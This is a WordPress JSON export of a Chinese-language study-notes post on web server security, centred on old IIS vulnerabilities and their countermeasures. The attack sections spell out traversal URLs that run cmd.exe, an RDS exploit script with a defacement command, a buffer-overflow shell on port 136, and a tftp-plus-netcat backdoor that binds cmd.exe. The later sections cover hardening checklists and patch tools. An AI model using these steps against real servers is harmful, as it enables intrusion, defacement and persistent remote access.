{"id":395,"date":"2015-10-19T19:49:00","date_gmt":"2015-10-19T11:49:00","guid":{"rendered":"http:\/\/note.systw.net\/note\/?p=395"},"modified":"2024-02-17T20:33:51","modified_gmt":"2024-02-17T12:33:51","slug":"webserver-security","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/395","title":{"rendered":"webserver security"},"content":{"rendered":"\n<p>web server defacement<\/p>\n\n\n\n<p>\u4ee5\u4e0b\u653b\u64ca\u90fd\u6709\u53ef\u80fddefacement:<br>man-in-the-middle attack:\u53ef\u80fd\u5728\u9060\u7aef\u767b\u5165\u6642\u5e33\u865f\u5bc6\u78bc\u5c31\u88ab\u5077\u4e86<br>password brute forcing of administrator account<br>dns attack through cache poisoning:dns recall\u5df1\u7d93\u88ab\u4fee\u6539,\u5f71\u97ff\u5c64\u9762\u5927<br>dns attack through social engineering<br>ftp server intrusion<br>mail server intrusion<br>web application bugs<br>web shares misconfigurations<br>wrongly assigned permissions<br>rerouting after firewall attack<br>recouting after router attack<br>sql injection<br>ssh intrusion<br>telnet intrusion<br>url poisoning<br>web server extension intrusion<br>remote service intrusion<\/p>\n\n\n\n<p><br>&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.<\/p>\n\n\n\n<p><br>attacks against iis<\/p>\n\n\n\n<p><strong>some of the popular iis vulnerabiliies are as follows:<\/strong><br>::$DATA iis\u3000vulnerability<br>showcode.asp<br>piggybacking privileged command execution on back-end database queries(mdac\/rds)<br>buffer overflow vulnerabilities:<br>\u3000IPP(internet printing protocol) buffer overflow<br>\u3000indexing services ISAPI extension buffer overflow<br>privilege command execution vulnerability<br>webDAV\/rpc exploits<\/p>\n\n\n\n<p>ps:On a default installation of Microsoft IIS web server, &#8220;system&#8221; privilege does the web server software execute<\/p>\n\n\n\n<p>&#8230;&#8230;&#8230;&#8230;&#8230;<\/p>\n\n\n\n<p><strong>::$DATA iis\u3000vulnerability<\/strong><br>ASP Alternate Data Streams\uff08::$DATA\uff09<br>1998\u5e74\u4e2d\u671f\u516c\u4f48<br>$DATA\u662f\u5728NTFS\u6a94\u6848\u7cfb\u7d71\u4e2d\u5b58\u5132\u5728\u6a94\u6848\u88cf\u9762\u7684main data stream\u5c6c\u6027\uff0c\u901a\u904e\u5efa\u7acb\u4e00\u500b\u7279\u6b8a\u683c\u5f0f\u7684URL\uff0c\u5c31\u53ef\u80fd\u4f7f\u7528IIS\u5728\u6d41\u89bd\u5668\u4e2d\u8a2a\u554f\u9019\u500bdata stream\uff08\u8cc7\u6599\u6d41\u7a0b\uff09\uff0c\u9019\u6a23\u505a\u4e5f\u5c31\u986f\u793a\u4e86\u6a94\u6848\u4ee3\u78bc\u4e2d\u9019\u4e9bdata stream\uff08\u8cc7\u6599\u6d41\u7a0b\uff09\u548c\u4efb\u4f55\u6a94\u6848\u6240\u5305\u542b\u7684\u8cc7\u6599\u4ee3\u78bc\u3002<br>\u9019\u500b\u6f0f\u6d1e\u9700\u9650\u5236\u5982\u4e0b:<br>1\u662f\u8981\u986f\u793a\u7684\u9019\u500b\u6a94\u6848\u9700\u8981\u4fdd\u5b58\u5728NTFS\u6a94\u6848\u5206\u5340<br>2\u662f\u6a94\u6848\u9700\u8981\u88abACL\u8a2d\u5b9a\u70ba\u5168\u5c40\u53ef\u8b80<br>3\u800c\u4e14\u672a\u6388\u6b0a\u7528\u6236\u9700\u8981\u77e5\u9053\u8981\u67e5\u770b\u6a94\u6848\u540d\u7684\u540d\u5b57<br>WIN NT\u4e2d\u7684IIS1.0, 2.0, 3.0\u548c4.0\u90fd\u5b58\u5728\u6b64\u554f\u984c\u3002<br>\u8981\u67e5\u770b\u4e00\u4e9b.asp\u6a94\u6848\u7684\u5167\u5bb9\uff0c\u4f60\u53ef\u4ee5\u8acb\u6c42\u5982\u4e0b\u7684URL \u5373\u53ef\u5f97\u5230\u4e86\u6e90\u4ee3\u78bc<br>http:\/\/victim\/default.asp::$DATA<\/p>\n\n\n\n<p>&#8230;&#8230;&#8230;&#8230;&#8230;<\/p>\n\n\n\n<p><strong>msadc<\/strong><br>IIS\u7684MDAC\u7d44\u4ef6\u5b58\u5728\u4e00\u500b\u6f0f\u6d1e\u53ef\u4ee5\u5c0e\u81f4\u653b\u64ca\u8005\u9060\u7a0b\u57f7\u884c\u4f60\u7cfb\u7d71\u7684\u547d\u4ee4\u3002<br>\u4e3b\u8981\u6838\u5fc3\u554f\u984c\u662f\u5b58\u5728\u65bcRDS Datafactory\uff0c\u9ed8\u8a8d\u60c5\u6cc1\u4e0b\uff0c\u5b83\u5141\u8a31\u9060\u7a0b\u547d\u4ee4\u767c\u9001\u5230IIS\u670d\u52d9\u5668\u4e2d\uff0c\u9019\u547d\u4ee4\u6703\u4ee5\u8a2d\u5099\u7528\u6236\u7684\u8eab\u4efd\u904b\u884c\uff0c\u5176\u4e00\u822c\u9ed8\u8a8d\u60c5\u6cc1\u4e0b\u662fSYSTEM\u7528\u6236\u3002<br>\u5229\u7528\u7a0b\u5e8f\u70bamsadc2.pl<br>\u505a\u6cd5\u5927\u81f4\u5982\u4e0b<br>perl msadc2.pl -h http:\/\/www.targe.com<br>&#8212; RDS smack v2 &#8211; rain forest puppy \/ ADM \/ wiretrip &#8212;<br>Type the command line you want to run (cmd \/c assumed):<br>cmd \/c<br>\u76f4\u63a5\u9375\u5165\u547d\u4ee4\u884c\uff0c\u5c31\u53ef\u4ee5\u4ee5system\u6b0a\u9650\u57f7\u884c\u547d\u4ee4,\u4f8b\u5982<br>echo hacked by me &gt; d:inetpubwwwrootvictimwebindex.htm<\/p>\n\n\n\n<p>ps:<br>perl msadc2.pl -h<br>&#8212; RDS smack v2 &#8211; rain forest puppy \/ ADM \/ wiretrip &#8212;<br>Usage: msadc.pl -h &lt; host &gt; { -d &lt; delay &gt; -X -v }<br>-h &lt; host &gt; = host you want to scan (ip or domain)<br>-d &lt; seconds &gt; = delay between calls, default 1 second<br>-X = dump Index Server path table, if available<br>-N = query VbBusObj for NetBIOS name<br>-V = use VbBusObj instead of ActiveDataFactory<br>-v = verbose<br>-e = external dictionary file for step 5<br>-u &lt; hostsharefile &gt; = use UNC file<br>-w = Windows 95 instead of Windows NT<br>-c = v1 compatibility (three step query)<br>-s &lt; number &gt; = run only step &lt; number &gt;<br>Or a -R will resume a (v2) command session<br>ps:<br>msadc.pl. rfp&#8217;s perl script is a perfect example of exploit chaining<\/p>\n\n\n\n<p>&#8230;&#8230;&#8230;&#8230;&#8230;<\/p>\n\n\n\n<p><strong>ISAPI Extension buffer overflow\u505a\u6cd5\u5927\u81f4\u5982\u4e0b<\/strong><br>1\u958b\u555f\u5c0d\u65b9136port<br>.\/Xiisprint &lt; ip &gt; nc136.bin<br>2telnet port 136\u5373\u53ef\u9032\u5165c:winntsystem32 &gt;<br>telnet &lt; ip &gt; 136<\/p>\n\n\n\n<p>&#8230;&#8230;&#8230;&#8230;&#8230;<\/p>\n\n\n\n<p>web server vulnerabilities<\/p>\n\n\n\n<p>unicode<br>\u65e9\u671fvulnerabilities<br>\u900f\u904e\u7de8\u78bc\u5e6b\u52a9<br>\u56e0\u6c92\u6709\u505a\u6aa2\u67e5\u800c\u88ab\u653b\u6483<br>\u53ef\u4e0d\u65b7\u8b8a\u5f62 &#8220;\/&#8221;=2f=c0af=e080af=f080af=f8808080af=\u5176\u4ed6\u7121\u9650\u9577&#8230;<br>\u904e\u9577unicode\u4e0d\u6703\u51fa\u932f,\u4e5f\u53ef\u4ee5\u88ab\u89e3\u78bc\u51fa\u4f86<\/p>\n\n\n\n<p><strong>unicode \u5e38\u898b\u653b\u64ca\u624b\u6cd5\u6709:<\/strong><br>\u76ee\u9304\u7a7f\u8d8a(Directory Traversal)<br>\u8996\u89ba\u6b3a\u9a19(Visual Security)<br>\u7e5e\u904e\u5b89\u5168\u6a5f\u5236(Bypassing Security Logic)<br>\u898f\u907f\u904e\u6ffe\u6a5f\u5236 (Filter Evasion)<\/p>\n\n\n\n<p><strong>directory traversal attack<\/strong><br>\u7531\u65bc\u65e9\u671f\u7684IIS\u7121\u6cd5\u8655\u7406\u975e\u6a19\u6e96\u7684HTTP\u8acb\u6c42\uff0c\u7576IIS\u63a5\u6536\u5230\u5305\u542bUnicode\u7de8\u78bc\u4e4b\u8def\u5f91\u540d\u7a31\u6642\uff0c\u5c07\u6703\u5c0d\u8a72\u8def\u5f91\u9032\u884c\u89e3\u78bc\uff0c\u5982\u679c\u653b\u64ca\u8005\u4f7f\u7528\u8a2d\u8a08\u904e\u7684\u7de8\u78bc\uff0c \u5c07\u5c0e\u81f4IIS\u932f\u8aa4\u6216\u958b\u555f\u4f3a\u670d\u5668\u6839\u76ee\u9304\u4ee5\u5916\u7684\u76ee\u9304\uff0c\u9020\u6210\u6d29\u6f0f\u975e\u7db2\u9801\u4f3a\u670d\u5668\u5141\u8a31\u63d0\u4f9b\u7684\u6a94\u6848\u6216\u61c9\u7528\u7a0b\u5f0f\u539f\u59cb\u78bc\uff0c\u751a\u81f3\u5728\u4f3a\u670d\u5668\u4e0a\u57f7\u884c\u4efb\u610f\u6307\u4ee4\u3002<br>\u505a\u6cd5\u5927\u81f4\u5982\u4e0b<br>GET\/scripts\/..%c0%af..\/winnt\/system32\/cmd.exe?\/c+dir=c: http\/1.0<br><strong>\u4f7f\u7528malformed url\u5b58\u53d6file\u6216folders<\/strong><br>\u505a\u6cd5\u5927\u81f4\u5982\u4e0b<br>\u7528 cmd.exe\u4f86\u57f7\u884cdir c:<br>http:\/\/&lt; web &gt;\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+dir+c:<br>\u8907\u88fdcmd.exe\u5230 cmd2.exe<br>http:\/\/&lt; web &gt;\/scripts\/..%c1%1c..\/winnt\/system32\/cmd.exe?\/c+copy+c:winntsystem32cmd.exe %20 .cmd2.exe<br><strong>allow the attacker to escalate privileges on the machine<\/strong><br>\u505a\u6cd5\u5927\u81f4<br><strong>\u5141\u8a31\u65b0\u589emalicious user,\u6539\u8b8a\u6216\u522a\u9664data,\u57f7\u884ccode<\/strong><br>\u505a\u6cd5\u5927\u81f4\u5982\u4e0b<br>\u5c07Defaced By ray \u5beb\u5165default.asp<br>http:\/\/&lt; web &gt;\/scripts\/cmd.exe?\/c+echo%20Defaced%20By%20ray &gt; c:inetpubwwwrootdefault.asp<br><strong>\u53ef\u4f7f\u7528netcat\u505abackdoor<\/strong><br>\u505a\u6cd5\u5927\u81f4\u5982\u4e0b<br>1 http:\/\/&lt; web &gt;\/scripts\/&#8230;%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:<br>2 tftp -I &lt; web &gt; GET nc.exe<br>3 nc -L -p &lt; port &gt; -d -e cmd.exe<br>\u6216<br>1 http:\/\/&lt; web &gt;\/scripts\/&#8230;%255c..\/winnt\/system32\/cmd.exe?\/c+dir+c:<br>2 http:\/\/&lt; exploit url &gt;\/c+TFTP+-i+&lt; web &gt;+GET+nc.exe<br>3 http:\/\/&lt; exploit url &gt;\/c+nc+-L+-p+&lt; port &gt;+-d+-e+cmd.exe<\/p>\n\n\n\n<p>ps:<br>iisxploit.exe: \u81ea\u52d5\u5316\u653b\u64catool<\/p>\n\n\n\n<p><strong>Visual Security<\/strong><br>\u53c8\u7a31\u70ba\u540c\u5f62\u7570\u7fa9\u5b57\u6b3a\u9a19(Homograph Spoofing Attack)<br>\u5728Unicode\u4e2d\uff0c\u6709\u8a31\u591a\u540c\u5f62\u7570\u7fa9\u5b57\uff0c\u5728\u8a31\u591a\u5b57\u578b\u4e2d\u90fd\u770b\u4e0d\u51fa\u6709\u751a\u9ebc\u4e0d\u540c\u3002\u65bc\u662f\u5165\u4fb5\u8005\u4fbf\u53ef\u7528\u6b64\u4f86\u6b3a\u9a19\u7528\u6236<br>ex:\u65af\u62c9\u592b\u5b57\u6bcd(Cyrillic)\u7684\u5c0f\u5beb\u0430(U+0430)\u548c\u62c9\u4e01\u5b57\u6bcd(Latin\uff0c\u5373\u82f1\u6587\u4f7f\u7528\u4e4b\u5b57\u6bcd)\u7684a(U+0061)<\/p>\n\n\n\n<p><strong>Bypassing Security Logic<\/strong><br>\u65e9\u671fIPS\u7121\u6cd5\u6b63\u78ba\u8655\u7406\u7279\u5225\u7684Unicode\u7de8\u78bc\u3001\u5927\u5c0f\u5beb\u8f49\u63db&#8230;\u7b49\uff0c\u5c07\u4f7f\u653b\u64ca\u8005\u53ef\u80fd\u5229\u7528\u6b64\u6f0f\u6d1e\u7e5e\u904e IPS\u7522\u54c1\u7684\u653b\u64ca\u6aa2\u6e2c\u3002<br>\u53e6 HTTP\u5167\u5bb9\u6383\u7784\u7cfb\u7d71(HTTP Content Scanning System)\u53ef\u4ee5\u89e3\u78bc\u5404\u7a2e\u985e\u578b\u7684HTTP\u7de8\u78bc\u8acb\u6c42\u4ee5\u9032\u884c\u653b\u64ca\u7279\u5fb5\u5206\u6790\uff0c\u4f46\u6709\u4e9b\u5167\u5bb9\u6383\u7784\u7cfb\u7d71\u7121\u6cd5\u6b63\u78ba\u5730\u6383\u7784\u5168\u5f62\u5b57(full-width)\u6216\u534a\u5f62\u5b57 (half-width)\u7684Unicode\u7de8\u78bc\u901a\u8a0a\u9032\u884c\u5206\u6790\u3001\u5927\u5c0f\u5beb\u8f49\u63db\u548c\u5b57\u7b26\u5339\u914d\u3002\u85c9\u7531\u50b3\u9001\u7d93\u8a2d\u8a08\u7684HTTP\u6d41\u91cf\u5230\u4e00\u500b\u6709\u5f31\u9ede\u7684\u6383\u7784\u7cfb\u7d71\uff0c\u653b\u64ca\u8005\u5f88\u53ef\u80fd \u7e5e\u904e\u5167\u5bb9\u6383\u7784\u7cfb\u7d71\uff0c\u9032\u884c\u5176\u4ed6\u84c4\u610f\u7834\u58de\u3002<\/p>\n\n\n\n<p><strong>Filter Evasion<\/strong><br>\u700f\u89bd\u5668\u5728\u8fa8\u5225\u7db2\u9801\u662f\u4f7f\u7528\u4f55\u7a2e\u7de8\u78bc\u6642\uff0c\u53ef\u85c9\u7531\u4f4d\u5143\u7d44\u9806\u5e8f\u8a18\u865f (Byte Order Mark, BOM)\u4f86\u5224\u65b7\u3002\u4f46\u6709\u4e9b\u4f3a\u670d\u5668\u6216\u700f\u89bd\u5668\u56e0\u7121\u6cd5\u8655\u7406BOM\u800c\u5efa\u7acb\u4e86\u904e\u6ffe\u6a5f\u5236\uff0c\u56e0\u6b64\u60e1\u610f\u7684\u7db2\u9801\u53ef\u80fd\u7528\u8a2d\u8a08\u904e\u7684\u7a0b\u5f0f\u6a19\u7c64\uff0c\u4f7f\u5f97\u65e9\u671f\u7248\u672c\u4e4bFirefox\u5728\u7565\u904e BOM\u7684\u8655\u7406\u5f8c\u53ef\u80fd\u906d\u53d7XSS\u653b\u64ca<\/p>\n\n\n\n<p>&#8230;<\/p>\n\n\n\n<p><strong>msw3prt ipp vulnerability<\/strong><br>1\uff0e\u6f0f\u6d1e\u5371\u5bb3\u53ca\u6210\u56e0<br>\u6b64\u6f0f\u6d1e\u53ea\u5b58\u5728\u65bc\u57f7\u884cIIS 5.0\u7684Windows 2000\u4f3a\u670d\u5668\u4e2d\u3002\u7531\u65bcIIS 5\u7684\u5217\u5370ISAPI\u64f4\u5c55\u63a5\u982d\u5efa\u7acb\u4e86.printer\u526f\u6a94\u540d\u5230Msw3prt.dll\u7684\u6620\u5c04\u95dc\u4fc2\uff08\u9810\u8a2d\u60c5\u6cc1\u4e0b\u8a72\u6620\u5c04\u4e5f\u5b58\u5728\uff09\uff0c\u7576\u9060\u7aef\u7528\u6236\u63d0\u4ea4 \u5c0d.printer\u7684URL\u8acb\u6c42\u6642\uff0cIIS 5.0\u6703\u4f7f\u7528Msw3prt.dll\u89e3\u91cb\u8a72\u8acb\u6c42\uff0c\u52a0\u4e4bMsw3prt.dll\u7f3a\u4e4f\u8db3\u5920\u7684\u7de9\u885d\u5340\u908a\u754c\u6aa2\u67e5\uff0c\u9060\u7aef\u7528\u6236\u53ef\u4ee5\u63d0\u4ea4\u4e00\u500b\u7cbe\u5fc3\u69cb\u9020\u7684\u91dd \u5c0d.printer\u7684URL\u8acb\u6c42\uff0c\u5176\u300cHost:\u300d\u57df\u5305\u542b\u5927\u7d04420B\u7684\u8cc7\u6599\uff0c\u6b64\u6642\u5728Msw3prt.dll\u4e2d\u767c\u751f\u5178\u578b\u7684\u7de9\u885d\u5340\u6ea2\u51fa\uff0c\u6f5b\u5728\u5730\u5141\u8a31\u57f7\u884c\u4efb\u610f \u7a0b\u5f0f\u78bc\u3002\u5728\u6ea2\u51fa\u767c\u751f\u5f8c\uff0cWeb\u670d\u52d9\u6703\u505c\u6b62\u7528\u6236\u56de\u61c9\uff0c\u800cWindows 2000\u5c07\u63a5\u8457\u81ea\u52d5\u91cd\u555f\u5b83\uff0c\u9032\u800c\u4f7f\u5f97\u7cfb\u7d71\u7ba1\u7406\u54e1\u5f88\u96e3\u6aa2\u67e5\u5230\u5df2\u767c\u751f\u7684\u653b\u64ca\u3002<br>2\uff0e\u6f0f\u6d1e\u6aa2\u6e2c<br>\u91dd\u5c0d.Printer\u6f0f\u6d1e\u7684\u6aa2\u6e2c\u8edf\u9ad4\u5f88\u591a\uff0c\u5982easyscan,x-scaner,SSS,&#8230;\u7b49\u3002<br>3\uff0e\u89e3\u6c7a\u65b9\u6cd5<br>\u53ef\u901a\u904e\u5b89\u88ddMicrosoft\u6f0f\u6d1e\u4fee\u6b63\u6a94<\/p>\n\n\n\n<p><strong>rpc dcom vulnerability<\/strong><br>COM\u5f31\u9ede\u53ef\u5f9e\u4ee5\u4e0bport\u627e\u5230<br>tcp and udp 135<br>tcp port 139 and 445<br>tcp port 593(rpc-over-http)<br>any iis http\/https port:if COM internet services are enabled<\/p>\n\n\n\n<p>ps:<br>dcom rpc exploit:\u653b\u64ca\u5de5\u5177<\/p>\n\n\n\n<p>&#8230;<\/p>\n\n\n\n<p>ps:<br>cmd.asp:asp trojan<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>URLEncoded<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>space %20\n! %21\n\" %22\n# %23\n$ %24\n% %25\n&amp; %26\n' %27\n( %28\n) %29\n, %2C\n: %3A\n; %3B\n&lt; %3C\n= %3D\n> %3E\n? %3F\n&#91; %5B\n\uff3c %5C\n] %5D\n^ %5E\n` %60\n{ %7B\n| %7C\n} %7D\n~ %7E\n%7F\n\u20ac %80\n\ufffd %81\n\u201a %82<\/code><\/pre>\n\n\n\n<p><br>&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.<\/p>\n\n\n\n<p><br>log<br>\u5efa\u8b70:<br>\u6539\u8b8a\u9810\u8a2d\u5b58\u653e\u4f4d\u7f6e<br>\u5b9a\u671f\u5099\u4efd<\/p>\n\n\n\n<p>ps:<br>log analyzer:network tool<br>cleaniislog:hacking tool<br>customerror:\u5ba2\u88fd\u5316log<\/p>\n\n\n\n<p>&#8230;.<\/p>\n\n\n\n<p>tool<\/p>\n\n\n\n<p>cacheright:\u589e\u52a0\u901f\u5ea6<br>httpzip:\u63d0\u5347\u6548\u80fd<br>zipenable:\u63d0\u5347\u6548\u80fd<br>w3compiler<\/p>\n\n\n\n<p>server mask:iis security tool,\u9632\u8b77\u5de5\u5177<br>servermask ip1000<br>linkdeny:\u963b\u9694tool<br>serverdefender AI:WAF<\/p>\n\n\n\n<p>yersinia<br>metasploit framework:\u5f31\u9ede\u653b\u64ca\u5de5\u5177<br>karma:\u53ef\u505afake ap,\u8b93client\u9023\u5230\u6b64fake ap<br>karmetasploit:karma+metasploit3,\u6703\u81ea\u52d5\u5c0d\u9023\u4f86\u6b64fake ap\u7684client\u505a\u5f31\u9ede\u6383\u63cf,\u4e26\u81ea\u52d5\u653b\u64ca<br>canvas:\u653b\u64ca\u5de5\u5177,\u9700\u6536\u8cbb<br>core impact:\u653b\u64ca\u5de5\u5177,\u9700\u6536\u8cbb<br>mpack:web exploitation,\u7528php\u958b\u767c<br>neosploit:\u653b\u64ca\u5de5\u5177<br>&#8230;&#8230;&#8230;&#8230;<\/p>\n\n\n\n<p>patch management<\/p>\n\n\n\n<p>tool<br>updateexpert<br>qfecheck:\u770bhotfix<br>hfnetchk:<br>cacls.exe: \u5167\u5efacomamd\u6307\u4ee4,\u770b\u8cc7\u6599\u593e\u6b0a\u9650<\/p>\n\n\n\n<p>&#8230;&#8230;&#8230;..<\/p>\n\n\n\n<p>vulnerability scanners<\/p>\n\n\n\n<p>ps:<br>online vulnerability search engine<br>NVD(national vulnerability database)<\/p>\n\n\n\n<p>\u5e38\u898b\u7684vulnerability scanner\u6709<br>online:www.securityseers.com,&#8230; \u7b49<br>opensource:snort,nessus,nmap,&#8230;\u7b49<br>linux proprietary:sane,&#8230;\u7b49<\/p>\n\n\n\n<p>other tool<br>whisker:\u8f03\u967d\u6625<br>n-stealth http vulnerability scanner:\u9700\u4ed8\u8cbb<br>webinspect:hacking tool<br>shadow security scanner<br>secureiis:\u4fdd\u8b77server,\u91dd\u5c0d\u5df1\u77e5\u548c\u672a\u77e5\u653b\u64ca\u505a\u4fdd\u8b77<br>serverscheck momnitoring:\u91dd\u5c0d\u983b\u5bec\u6216\u4f86\u56de\u5c01\u5305\u91cf\u8a18\u9304,\u4ee5\u53ca\u56de\u5831\u4e00\u4e9b\u653b\u64ca<br>gfi network server monitor:<br>servers alive:\u5224\u65b7server\u662f\u5426\u9084\u6d3b\u8457<br>webserver stress tool:\u58d3\u529b\u6e2c\u8a66tool<br>securnia psi:\u6aa2\u67e5\u6bcf\u500b\u7a0b\u5f0f\u662f\u5426\u66f4\u65b0,\u5efa\u8b70\u5b89\u88dd<\/p>\n\n\n\n<p><br>&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;&#8230;.<\/p>\n\n\n\n<p><strong>countermeasures:<\/strong><br>iislockdown: \u6709\u5305\u542burlscan<br>urlscan<br>mbsa utility:microsoft baseline security analyzer<\/p>\n\n\n\n<p><strong>file system traversal countermeasures<\/strong><br>\u975eadmin\u4e0d\u53ef\u57f7\u884ccmd<br>\u79fb\u9664sample files<br>\u5e38\u770baudit log<br>\u505apatch,hotfix<\/p>\n\n\n\n<p><strong>increasing web server security<\/strong><br>\u4f7f\u7528firewall<br>\u8981\u6539account<br>iis default websites\u8981\u95dc\u6389<br>removal of unused application mappings<br>\u95dc\u9589directory browsing<br>legal notices<br>service packs,hotfixes,and templates<br>checking for malicious input in forms and query strings<br>\u95dc\u9589remote administrator<\/p>\n\n\n\n<p><br><strong>web server security checklist:<\/strong><br>patches and updates<br>auditing and logging<br>services:disable non-required services<br>script mappings<br>protocols:disable webdav,netbios,smb(block port137,138,139,445)<br>isapi filters:remove unused isapi filters<br>accounts:\u4e0d\u9700\u8981\u7684\u5c31\u95dc\u6389<br>files and directories<br>iis metabase<br>server certificates<br>diable shares:\u7528registry\u95dc\u6389,\u4e0b\u6b21\u91cd\u958b\u5c31\u4e0d\u6703\u555f\u7528<br>machine.config<br>ports<br>code access security<\/p>\n\n\n\n<p><br>ps:<br>Cloaking<br>\u5b83\u6307\u7684\u662f\u4e00\u7a2e\u6280\u8853\uff0c\u5411\u641c\u7d22\u5f15\u64ce\u8718\u86db\u548c\u5ba2\u6236\u63d0\u4f9b\u4e0d\u540c\u7684\u7db2\u9801\uff0c\u9019\u7a2e\u6280\u8853\u88abSPAMMERS\u505a\u7232KEYWORD STUFFING\u6feb\u7528\u4e86\uff0cCLOAKING\u9055\u53cd\u4e86\u5927\u591a\u6578\u641c\u7d22\u5f15\u64ce\u7684\u670d\u52d9\u689d\u6b3e\uff0c\u5982\u679c\u88ab\u767c\u73fe\u7684\u8a71\u7db2\u7ad9\u5c07\u6703\u88ab\u5b83\u5011\u53d6\u7de0\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>web server defacement \u4ee5\u4e0b\u653b\u64ca\u90fd\u6709\u53ef\u80fd &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[39],"tags":[],"class_list":["post-395","post","type-post","status-publish","format-standard","hentry","category-concept"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/395","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=395"}],"version-history":[{"count":0,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/395\/revisions"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=395"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=395"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=395"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}